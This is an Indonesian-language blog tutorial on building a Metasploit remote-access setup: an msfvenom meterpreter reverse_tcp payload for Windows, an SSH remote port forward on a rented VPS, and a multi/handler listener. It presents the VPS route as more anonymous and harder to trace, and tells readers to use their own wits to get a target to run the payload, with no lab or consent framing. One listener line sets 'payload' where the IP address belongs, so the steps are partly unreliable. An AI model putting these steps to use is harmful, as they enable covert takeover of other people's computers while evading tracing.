RAT/Reverse Shell Di SSH Menggunakan Metasploit: Menggunakan Method Port Forwading
Reverse shell Di SSH Menggunakan Metasploit: Menggunakan Method Port Forwading - Saat ingin melakukan reverse shell maka kita perlu server yang digunakan untuk menerima data dari target. Biasanya target yang masih dalam satu network maka hanya perlu menggunakan localhost. Namun jika target berbeda koneksi/network maka kita perlu server yang bisa diakses, Ngrok menjadi salah satu software yang biasa digunakan untuk port forwading namun durasi dari Ngrok terbatas dan lebih tidak secure/aman maka dari itu kita perlu alternative lain yaitu dengan SSH/VPS.
Apa itu SSH Tunneling/SSH Port Forwading?
SSH Tunneling atau sering disebut SSH Port Forwading adalah teknik yang digunakan untuk mengarahkan lalu lintas
Mengapa harus SSH/VPS?.
1. Lebih anonim. Saat menggunakan VPS/SSH, anda dapat memanfaatkan keamanan yang baik dari SSH/VPS selain itu prosesnya terjadi di VPS/SSH jadi lebih susah untuk dilacak / dipantau berbeda dengan Ngrok yang menggunakan localhost sebagai Port Forwading jadi lebih gampang di lacak.
2. Durasi tidak terbatas (tergantung masa sewa/suspend dari ssh itu).
3. Lebih cepat. karena SSH/VPS yang dibuat dengan penyedia layanan cloud memiliki internet yang cepat dan stabil dibandingkan memakai Ngrok yang memakai internet sendiri.
Awalnya saya mencoba Port Forwading dari server SSH/VPS saya ke localhost saya sendiri. dan terbukti itu tidak work karena endpoint nya sendiri berada di localhost saya yang hanya bisa diakses oleh yang berada dalam 1 network. Jadi disini saya berpikir bagaimana cara saya menjadikan VPS/SSH saya sebagai listener untuk payload Metasploit?. Setelah experiment yang cukup panjang disini sayang menemukan jawabannya yaitu dengan Port Forwading di VPS/SSH menggunakan IP/Server VPS/SSH saya sendiri dengan begitu Port Forwading akan mengarah ke server saya sendiri.
Tutorial :
1. Pastikan IP VPS/SSH kalian bisa diakses secara publik, kalian bisa mencobanya dengan mengakses IP VPS/SSH kalian di browser.
1. Pastikan kalian login sebagai root.ssh root@example.com2. Install apache2 (jika belum terinstall)apt install apache2 # untuk debian/keturunannya.3. enable dan start apache2systemctl enable apache2systemctl start apache24. Update firewall configuration agar Port HTTP/S bisa diakses.ufw allow 80ufw allow 443jika command not found kalian bisa install ufw terlebih dahuluapt install ufw5. Restart ssh dan apache2systemctl restart sshdsystemctl restart apache2Lalu kalian coba akses IP VPS/SSH kalian di browser. jika belum bisa terkoneksi restart VPS/SSH kalian
Jika IP kalian sudah bisa terkoneksi secara public, siapkan 2 terminal di local machine.
kalian login terlebih dahulu ke SSH/VPS kalian dengan 2 terminal tersebut.
ssh root@example.com
Jika kalian belum menginstall metasploit maka install terlebih dahulu. gunakan link dibawah ini untuk dokumentasi penginstallan metasploit.
https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html
1. Buat payload dengan msfvenom.
Disini saya menargetkan windows machine jadi saya akan membuat payload exe.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip vps kalian> LPORT=<port bebas> -f exe > payload.exe
Lalu jika payload sudah terbuat kalian jalankan command berikut untuk melakukan Port Forwading.
ssh -R <port>:<ip ssh kalian>:80 root@<ip ssh kalian>
pada bagian port isi dengan port yang kalian inputkan di LPORT= pada msfvenom. dan kalian login seperti biasa. Example :
ssh -R 1337:45.34.54.64:80 root@45.34.54.64
Beralih ke terminal satunya. gunakan untuk menkonfigurasi listener dari machine kita agar bisa menerima dari data dari payload ketika di running oleh mesin target.
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set payload <ip vps kalian>
set lport <port yang di inputkan tadi>
run
Setelah itu kalian tinggal mengeksekusi payload di mesin target (pake otaklo biar gimana caranya si target mau ngerun payload yang lo kasih).
Penutupan
Mungkin segitu aja materi kali ini. jika ada error/kesalahan kalian bisa berkomentar. terimakasih!
Keep calm and Stay Quiet
Post a Comment